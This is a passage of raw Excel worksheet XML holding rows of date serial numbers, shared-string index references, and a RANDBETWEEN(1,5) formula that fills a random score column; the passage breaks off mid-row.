    <row r="513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A513" s="1">
        <v>43550.397696759261</v>
      </c>
      <c r="B513" t="s">
        <v>13</v>
      </c>
      <c r="C513" t="s">
        <v>10</v>
      </c>
      <c r="D513" t="s">
        <v>290</v>
      </c>
      <c r="E513" t="s">
        <v>613</v>
      </c>
      <c r="F513">
        <f t="shared" ca="1" si="7"/>
        <v>2</v>
      </c>
    </row>
    <row r="514" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A514" s="1">
        <v>43550.390821759262</v>
      </c>
      <c r="B514" t="s">
        <v>5</v>
      </c>
      <c r="C514" t="s">
        <v>454</v>
      </c>
      <c r="D514" t="s">
        <v>312</v>
      </c>
      <c r="E514" s="2" t="s">
        <v>614</v>
      </c>
      <c r="F514">
        <f t="shared" ref="F514:F577" ca="1" si="8">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A515" s="1">
        <v>43550.383703703701</v>
      </c>
      <c r="B515" t="s">
        <v>19</v>
      </c>
      <c r="C515" t="s">
        <v>10</v>
      </c>
      <c r="D515" t="s">
        <v>192</v>
      </c>
      <c r="E515" t="s">
        <v>615</v>
      </c>
      <c r="F515">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A516" s="1">
        <v>43550.381192129629</v>
      </c>
      <c r="B516" t="s">
        <v>5</v>
      </c>
      <c r="C516" t="s">
        <v>65</v>
      </c>
      <c r="F516">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A517" s="1">
        <v>43550.381180555552</v>
      </c>
      <c r="B517" t="s">
        <v>5</v>
      </c>
      <c r="C517" t="s">
        <v>65</v>
      </c>
      <c r="F517">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="518" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A518" s="1">
        <v>43550.381180555552</v>
      </c>
      <c r="B518" t="s">
        <v>5</v>
      </c>
      <c r="C518" t="s">
        <v>65</v>
      </c>
      <c r="F518">
        <f t="shared" ca="1" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A519" s="1">
        <v>43550.381168981483</v>
      </c>
      <c r="B519" t="s">
        <v>5</v>
      </c>
      <c r="C519" t="s">
        <v>65</v>
      </c>
      <c r="F519">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A520" s="1">
        <v>43550.379062499997</v>
      </c>
      <c r="B520" t="s">
        <v>5</v>
      </c>
      <c r="C520" t="s">
        <v>10</v>
      </c>
      <c r="D520" t="s">
        <v>192</v>
      </c>
      <c r="E520" t="s">
        <v>617</v>
      </c>
      <c r="F520">
        <f t="shared" ca="1" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A521" s="1">
        <v>43550.379016203704</v>
      </c>
      <c r="B521" t="s">
        <v>5</v>
      </c>
      <c r="C521" t="s">
        <v>48</v>
      </c>
      <c r="E521" t="s">
        <v>618</v>
      </c>
      <c r="F521">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="522" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A522" s="1">
        <v>43550.368043981478</v>
      </c>
      <c r="B522" t="s">
        <v>19</v>
      </c>
      <c r="C522" t="s">
        <v>63</v>
      </c>
      <c r="E522" s="2" t="s">
        <v>619</v>
      </c>
      <c r="F522">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="523" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A523" s="1">
        <v>43550.364641203705</v>
      </c>
      <c r="B523" t="s">
        <v>9</v>
      </c>
      <c r="C523" t="s">
        <v>48</v>
      </c>
      <c r="E523" s="2" t="s">
        <v>620</v>
      </c>
      <c r="F523">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A524" s="1">
        <v>43550.349178240744</v>
      </c>
      <c r="B524" t="s">
        <v>22</v>
      </c>
      <c r="C524" t="s">
        <v>41</v>
      </c>
      <c r="E524" t="s">
        <v>621</v>
      </c>
      <c r="F524">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="525" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A525" s="1">
        <v>43550.347025462965</v>
      </c>
      <c r="B525" t="s">
        <v>19</v>
      </c>
      <c r="C525" t="s">
        <v>10</v>
      </c>
      <c r="D525" t="s">
        <v>36</v>
      </c>
      <c r="E525" s="2" t="s">
        <v>622</v>
      </c>
      <c r="F525">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A526" s="1">
        <v>43550.344398148147</v>
      </c>
      <c r="B526" t="s">
        <v>13</v>
      </c>
      <c r="C526" t="s">
        <v>623</v>
      </c>
      <c r="E526" t="s">
        <v>624</v>
      </c>
      <c r="F526">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="527" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A527" s="1">
        <v>43550.341377314813</v>
      </c>
      <c r="B527" t="s">
        <v>5</v>
      </c>
      <c r="C527" t="s">
        <v>41</v>
      </c>
      <c r="D527" t="s">
        <v>312</v>
      </c>
      <c r="E527" t="s">
        <v>625</v>
      </c>
      <c r="F527">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="528" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A528" s="1">
        <v>43550.332453703704</v>
      </c>
      <c r="B528" t="s">
        <v>35</v>
      </c>
      <c r="C528" t="s">
        <v>41</v>
      </c>
      <c r="E528" s="2" t="s">
        <v>626</v>
      </c>
      <c r="F528">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="529" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A529" s="1">
        <v>43550.307256944441</v>
      </c>
      <c r="B529" t="s">
        <v>13</v>
      </c>
      <c r="C529" t="s">
        <v>67</v>
      </c>
      <c r="E529" s="2" t="s">
        <v>627</v>
      </c>
      <c r="F529">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="530" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A530" s="1">
        <v>43550.287962962961</v>
      </c>
      <c r="B530" t="s">
        <v>22</v>
      </c>
      <c r="C530" t="s">
        <v>166</v>
      </c>
      <c r="E530" s="2" t="s">
        <v>628</v>
      </c>
      <c r="F530">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="531" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A531" s="1">
        <v>43550.260752314818</v>
      </c>
      <c r="B531" t="s">
        <v>9</v>
      </c>
      <c r="C531" t="s">
        <v>48</v>
      </c>
      <c r="E531" s="2" t="s">
        <v>629</v>
      </c>
      <c r="F531">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="532" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A532" s="1">
        <v>43550.249236111114</v>
      </c>
      <c r="B532" t="s">
        <v>13</v>
      </c>
      <c r="C532" t="s">
        <v>344</v>
      </c>
      <c r="E532" s="2" t="s">
        <v>630</v>
      </c>
      <c r="F532">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="533" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A533" s="1">
        <v>43550.23909722222</v>
      </c>
      <c r="B533" t="s">
        <v>5</v>
      </c>
      <c r="C533" t="s">
        <v>124</v>
      </c>
      <c r="E533" s="2" t="s">
        <v>631</v>
      </c>
      <c r="F533">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="534" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A534" s="1">
        <v>43550.230196759258</v>
      </c>
      <c r="B534" t="s">
        <v>5</v>
      </c>
      <c r="C534" t="s">
        <v>139</v>
      </c>
      <c r="D534" t="s">
        <v>632</v>
      </c>
      <c r="E534" s="2" t="s">
        <v>633</v>
      </c>
      <c r="F534">
        <f t="shared" ca="1" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="535" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A535" s="1">
        <v>43550.229618055557</v>
      </c>
      <c r="B535" t="s">
        <v>13</v>
      </c>
      <c r="C535" t="s">
        <v>634</v>
      </c>
      <c r="E535" s="2" t="s">
        <v>635</v>
      </c>
      <c r="F535">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="536" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A536" s="1">
        <v>43550.21130787037</v>
      </c>
      <c r="B536" t="s">
        <v>22</v>
      </c>
      <c r="C536" t="s">
        <v>41</v>
      </c>
      <c r="E536" s="2" t="s">
        <v>636</v>
      </c>
      <c r="F536">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A537" s="1">
        <v>43550.181400462963</v>
      </c>
      <c r="B537" t="s">
        <v>19</v>
      </c>
      <c r="C537" t="s">
        <v>71</v>
      </c>
      <c r="E537" t="s">
        <v>637</v>
      </c>
      <c r="F537">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A538" s="1">
        <v>43550.164131944446</v>
      </c>
      <c r="B538" t="s">
        <v>5</v>
      </c>
      <c r="C538" t="s">
        <v>71</v>
      </c>
      <c r="E538" t="s">
        <v>638</v>
      </c>
      <c r="F538">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="539" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A539" s="1">
        <v>43550.125416666669</v>
      </c>
      <c r="B539" t="s">
        <v>5</v>
      </c>
      <c r="C539" t="s">
        <v>253</v>
      </c>
      <c r="E539" s="2" t="s">
        <v>639</v>
      </c>
      <c r="F539">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A540" s="1">
        <v>43550.120370370372</v>
      </c>
      <c r="B540" t="s">
        <v>5</v>
      </c>
      <c r="C540" t="s">
        <v>134</v>
      </c>
      <c r="E540" t="s">
        <v>640</v>
      </c>
      <c r="F540">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A541" s="1">
        <v>43550.044930555552</v>
      </c>
      <c r="B541" t="s">
        <v>13</v>
      </c>
      <c r="C541" t="s">
        <v>41</v>
      </c>
      <c r="F541">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="542" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A542" s="1">
        <v>43549.996481481481</v>
      </c>
      <c r="B542" t="s">
        <v>5</v>
      </c>
      <c r="C542" t="s">
        <v>140</v>
      </c>
      <c r="D542" t="s">
        <v>234</v>
      </c>
      <c r="E542" s="2" t="s">
        <v>641</v>
      </c>
      <c r="F542">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="543" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A543" s="1">
        <v>43549.995729166665</v>
      </c>
      <c r="B543" t="s">
        <v>19</v>
      </c>
      <c r="C543" t="s">
        <v>140</v>
      </c>
      <c r="D543" t="s">
        <v>234</v>
      </c>
      <c r="E543" s="2" t="s">
        <v>642</v>
      </c>
      <c r="F543">
        <f t="shared" ca="1" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A544" s="1">
        <v>43549.940983796296</v>
      </c>
      <c r="B544" t="s">
        <v>5</v>
      </c>
      <c r="C544" t="s">
        <v>10</v>
      </c>
      <c r="D544" t="s">
        <v>6</v>
      </c>
      <c r="E544" t="s">
        <v>643</v>
      </c>
      <c r="F544">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A545" s="1">
        <v>43549.93849537037</v>
      </c>
      <c r="B545" t="s">
        <v>19</v>
      </c>
      <c r="C545" t="s">
        <v>10</v>
      </c>
      <c r="D545" t="s">
        <v>89</v>
      </c>
      <c r="E545" t="s">
        <v>644</v>
      </c>
      <c r="F545">
        <f t="shared" ca="1" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="546" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A546" s="1">
        <v>43549.905185185184</v>
      </c>
      <c r="B546" t="s">
        <v>5</v>
      </c>
      <c r="C546" t="s">
        <v>144</v>
      </c>
      <c r="E546" s="2" t="s">
        <v>645</v>
      </c>
      <c r="F546">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="547" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A547" s="1">
        <v>43549.902465277781</v>
      </c>
      <c r="B547" t="s">
        <v>5</v>
      </c>
      <c r="C547" t="s">
        <v>10</v>
      </c>
      <c r="D547" t="s">
        <v>6</v>
      </c>
      <c r="E547" t="s">
        <v>646</v>
      </c>
      <c r="F547">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A548" s="1">
        <v>43549.885648148149</v>
      </c>
      <c r="B548" t="s">
        <v>35</v>
      </c>
      <c r="C548" t="s">
        <v>408</v>
      </c>
      <c r="E548" t="s">
        <v>647</v>
      </c>
      <c r="F548">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="549" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A549" s="1">
        <v>43549.835081018522</v>
      </c>
      <c r="B549" t="s">
        <v>22</v>
      </c>
      <c r="C549" t="s">
        <v>10</v>
      </c>
      <c r="D549" t="s">
        <v>36</v>
      </c>
      <c r="E549" t="s">
        <v>648</v>
      </c>
      <c r="F549">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="550" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A550" s="1">
        <v>43549.82744212963</v>
      </c>
      <c r="B550" t="s">
        <v>13</v>
      </c>
      <c r="C550" t="s">
        <v>260</v>
      </c>
      <c r="E550" s="2" t="s">
        <v>649</v>
      </c>
      <c r="F550">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A551" s="1">
        <v>43549.785960648151</v>
      </c>
      <c r="B551" t="s">
        <v>13</v>
      </c>
      <c r="C551" t="s">
        <v>10</v>
      </c>
      <c r="D551" t="s">
        <v>6</v>
      </c>
      <c r="E551" t="s">
        <v>650</v>
      </c>
      <c r="F551">
        <f t="shared" ca="1" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="552" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A552" s="1">
        <v>43549.745358796295</v>
      </c>
      <c r="B552" t="s">
        <v>5</v>
      </c>
      <c r="C552" t="s">
        <v>10</v>
      </c>
      <c r="D552" t="s">
        <v>494</v>
      </c>
      <c r="E552" s="2" t="s">
        <v>651</v>
      </c>
      <c r="F552">
        <f t="shared" ca="1" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A553" s="1">
        <v>43549.724259259259</v>
      </c>
      <c r="B553" t="s">
        <v>5</v>
      </c>
      <c r="C553" t="s">
        <v>10</v>
      </c>
      <c r="D553" t="s">
        <v>46</v>
      </c>
      <c r="E553" t="s">
        <v>652</v>
      </c>
      <c r="F553">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="554" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A554" s="1">
        <v>43549.724224537036</v>
      </c>
      <c r="B554" t="s">
        <v>5</v>
      </c>
      <c r="C554" t="s">
        <v>10</v>
      </c>
      <c r="D554" t="s">
        <v>46</v>
      </c>
      <c r="E554" t="s">
        <v>652</v>
      </c>
      <c r="F554">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="555" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A555" s="1">
        <v>43549.70349537037</v>
      </c>
      <c r="B555" t="s">
        <v>19</v>
      </c>
      <c r="C555" t="s">
        <v>10</v>
      </c>
      <c r="D555" t="s">
        <v>6</v>
      </c>
      <c r="E555" t="s">
        <v>653</v>
      </c>
      <c r="F555">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="556" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A556" s="1">
        <v>43549.660254629627</v>
      </c>
      <c r="B556" t="s">
        <v>35</v>
      </c>
      <c r="C556" t="s">
        <v>6</v>
      </c>
      <c r="D556" t="s">
        <v>25</v>
      </c>
      <c r="E556" s="2" t="s">
        <v>654</v>
      </c>
      <c r="F556">
        <f t="shared" ca="1" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A557" s="1">
        <v>43549.657719907409</v>
      </c>
      <c r="B557" t="s">
        <v>5</v>
      </c>
      <c r="C557" t="s">
        <v>10</v>
      </c>
      <c r="D557" t="s">
        <v>56</v>
      </c>
      <c r="E557" t="s">
        <v>655</v>
      </c>
      <c r="F557">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A558" s="1">
        <v>43549.652557870373</v>
      </c>
      <c r="B558" t="s">
        <v>19</v>
      </c>
      <c r="C558" t="s">
        <v>10</v>
      </c>
      <c r="D558" t="s">
        <v>17</v>
      </c>
      <c r="E558" t="s">
        <v>656</v>
      </c>
      <c r="F558">
        <f t="shared" ca="1" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A559" s="1">
        <v>43549.611122685186</v>
      </c>
      <c r="B559" t="s">
        <v>19</v>
      </c>
      <c r="C559" t="s">
        <v>10</v>
      </c>
      <c r="D559" t="s">
        <v>94</v>
      </c>
      <c r="E559" t="s">
        <v>657</v>
      </c>
      <c r="F559">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="560" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A560" s="1">
        <v>43549.606562499997</v>
      </c>
      <c r="B560" t="s">
        <v>19</v>
      </c>
      <c r="C560" t="s">
        <v>6</v>
      </c>
      <c r="E560" s="2" t="s">
        <v>658</v>
      </c>
      <c r="F560">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="561" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A561" s="1">
        <v>43549.60297453704</v>
      </c>
      <c r="B561" t="s">
        <v>19</v>
      </c>
      <c r="C561" t="s">
        <v>10</v>
      </c>
      <c r="D561" t="s">
        <v>20</v>
      </c>
      <c r="E561" s="2" t="s">
        <v>659</v>
      </c>
      <c r="F561">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A562" s="1">
        <v>43549.60052083333</v>
      </c>
      <c r="B562" t="s">
        <v>22</v>
      </c>
      <c r="C562" t="s">
        <v>10</v>
      </c>
      <c r="D562" t="s">
        <v>52</v>
      </c>
      <c r="E562" t="s">
        <v>660</v>
      </c>
      <c r="F562">
        <f t="shared" ca="1" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="563" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A563" s="1">
        <v>43549.573611111111</v>
      </c>
      <c r="B563" t="s">
        <v>5</v>
      </c>
      <c r="C563" t="s">
        <v>16</v>
      </c>
      <c r="E563" s="2" t="s">
        <v>661</v>
      </c>
      <c r="F563">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="564" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A564" s="1">
        <v>43549.571909722225</v>
      </c>
      <c r="B564" t="s">
        <v>19</v>
      </c>
      <c r="C564" t="s">
        <v>10</v>
      </c>
      <c r="D564" t="s">
        <v>52</v>
      </c>
      <c r="E564" s="2" t="s">
        <v>662</v>
      </c>
      <c r="F564">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="565" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A565" s="1">
        <v>43549.570868055554</v>
      </c>
      <c r="B565" t="s">
        <v>5</v>
      </c>
      <c r="C565" t="s">
        <v>10</v>
      </c>
      <c r="D565" t="s">
        <v>52</v>
      </c>
      <c r="E565" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F565">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A566" s="1">
        <v>43549.568877314814</v>
      </c>
      <c r="B566" t="s">
        <v>19</v>
      </c>
      <c r="C566" t="s">
        <v>10</v>
      </c>
      <c r="D566" t="s">
        <v>151</v>
      </c>
      <c r="E566" t="s">
        <v>664</v>
      </c>
      <c r="F566">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="567" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A567" s="1">
        <v>43549.558969907404</v>
      </c>
      <c r="B567" t="s">
        <v>19</v>
      </c>
      <c r="C567" t="s">
        <v>6</v>
      </c>
      <c r="D567" t="s">
        <v>25</v>
      </c>
      <c r="E567" s="2" t="s">
        <v>665</v>
      </c>
      <c r="F567">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="568" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A568" s="1">
        <v>43549.556620370371</v>
      </c>
      <c r="B568" t="s">
        <v>19</v>
      </c>
      <c r="C568" t="s">
        <v>10</v>
      </c>
      <c r="D568" t="s">
        <v>222</v>
      </c>
      <c r="E568" s="2" t="s">
        <v>666</v>
      </c>
      <c r="F568">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="569" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A569" s="1">
        <v>43549.556076388886</v>
      </c>
      <c r="B569" t="s">
        <v>35</v>
      </c>
      <c r="C569" t="s">
        <v>667</v>
      </c>
      <c r="D569" t="s">
        <v>194</v>
      </c>
      <c r="E569" s="2" t="s">
        <v>668</v>
      </c>
      <c r="F569">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="570" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A570" s="1">
        <v>43549.552256944444</v>
      </c>
      <c r="B570" t="s">
        <v>19</v>
      </c>
      <c r="C570" t="s">
        <v>10</v>
      </c>
      <c r="D570" t="s">
        <v>52</v>
      </c>
      <c r="E570" s="2" t="s">
        <v>669</v>
      </c>
      <c r="F570">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="571" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A571" s="1">
        <v>43549.551122685189</v>
      </c>
      <c r="B571" t="s">
        <v>13</v>
      </c>
      <c r="C571" t="s">
        <v>10</v>
      </c>
      <c r="D571" t="s">
        <v>23</v>
      </c>
      <c r="E571" t="s">
        <v>670</v>
      </c>
      <c r="F571">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="572" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A572" s="1">
        <v>43549.517268518517</v>
      </c>
      <c r="B572" t="s">
        <v>35</v>
      </c>
      <c r="C572" t="s">
        <v>43</v>
      </c>
      <c r="E572" s="2" t="s">
        <v>671</v>
      </c>
      <c r="F572">
        <f t="shared" ca="1" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="573" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A573" s="1">
        <v>43549.509131944447</v>
      </c>
      <c r="B573" t="s">
        <v>5</v>
      </c>
      <c r="C573" t="s">
        <v>10</v>
      </c>
      <c r="D573" t="s">
        <v>89</v>
      </c>
      <c r="E573" t="s">
        <v>672</v>
      </c>
      <c r="F573">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A574" s="1">
        <v>43549.498495370368</v>
      </c>
      <c r="B574" t="s">
        <v>13</v>
      </c>
      <c r="C574" t="s">
        <v>6</v>
      </c>
      <c r="D574" t="s">
        <v>124</v>
      </c>
      <c r="E574" t="s">
        <v>673</v>
      </c>
      <c r="F574">
        <f t="shared" ca="1" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="575" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A575" s="1">
        <v>43549.498391203706</v>
      </c>
      <c r="B575" t="s">
        <v>5</v>
      </c>
      <c r="C575" t="s">
        <v>48</v>
      </c>
      <c r="E575" t="s">
        <v>674</v>
      </c>
      <c r="F575">
        <f t="shared" ca="1" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="576" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A576" s="1">
        <v>43549.494884259257</v>
      </c>
      <c r="B576" t="s">
        <v>5</v>
      </c>
      <c r="C576" t="s">
        <v>6</v>
      </c>
      <c r="D576" t="s">
        <v>25</v>
      </c>
      <c r="E576" t="s">
        <v>675</v>
      </c>
      <c r="F576">
        <f t="shared" ca="1" si="8"/>
        <v>4</v>
      </c>
    </row>
    <row r="577" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A577" s="1">
        <v>43549.49015046296</v>
      </c>
      <c r="B577" t="s">
        <v>13</v>
      </c>
      <c r="C577" t="s">
        <v>10</v>
      </c>
      <c r="D577" t="s">
        <v>192</v>
      </c>
      <c r="E577" t="s">
        <v>676</v>
      </c>
      <c r="F577">
        <f t="shared" ca="1" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="578" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A578" s="1">
        <v>43549.489259259259</v>
      </c>
      <c r="B578" t="s">
        <v>19</v>
      </c>
      <c r="C578" t="s">
        <v>10</v>
      </c>
      <c r="D578" t="s">
        <v>80</v>
      </c>
      <c r="E578" t="s">
        <v>677</v>
      </c>
      <c r="F578">
        <f t="shared" ref="F578:F641" ca="1" si="9">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="579" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A579" s="1">
        <v>43549.489027777781</v>
      </c>
      <c r="B579" t="s">
        <v>19</v>
      </c>
      <c r="C579" t="s">
        <v>10</v>
      </c>
      <c r="D579" t="s">
        <v>52</v>
      </c>
      <c r="E579" s="2" t="s">
        <v>678</v>
      </c>
      <c r="F579">
        <f t="shared" ca="1" si="9"/>
        <v>5</v>
      </c>
    </row>
    <row r="580" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A580" s="1">
        <v>43549.481770833336</v>
      </c>
      <c r="B580" t="s">
        <v>5</v>
      </c>
      <c r="C580" t="s">
        <v>41</v>
      </c>
      <c r="E580" s="2" t="s">
        <v>679</v>
      </c>
      <c r="F580">
        <f t="shared" ca="1" si="9"/>
        <v>5</v>
      </c>
    </row>
    <row r="581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A581" s="1">
        <v>43549.471655092595</v>
      </c>
      <c r="B581" t="s">
        <v>13</v>
      </c>
      <c r="C581" t="s">
        <v>10</v>
      </c>
      <c r="D581" t="s">
        <v>17</v>
      </c>
      <c r="E581" t="s">
        <v>680</v>
      </c>
      <c r="F581">
        <f t="shared" ca="1" si="9"/>
        <v>1</v>
      </c>
    </row>
    <row r="582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A582" s="1">
        <v>43549.455358796295</v>
      </c>
      <c r="B582" t="s">
        <v>13</v>
      </c>
      <c r="C582" t="s">
        <v>41</v>
      </c>
      <c r="E582" t="s">
        <v>681</v>
      </c>
      <c r="F582">
        <f t="shared" ca="1" si="9"/>
        <v>4</v>
      </c>
    </row>
    <row r="583" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A583" s="1">
        <v>43549.452916666669</v>
      </c>
      <c r="B583" t="s">
        <v>5</v>
      </c>
      <c r="C583" t="s">
        <v>6</v>
      </c>
      <c r="D583" t="s">
        <v>25</v>
      </c>
      <c r="E583" s="2" t="s">
        <v>682</v>
      </c>
      <c r="F583">
        <f t="shared" ca="1" si="9"/>
        <v>4</v>
      </c>
    </row>
    <row r="584" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A584" s="1">
        <v>43549.434178240743</v>
      </c>
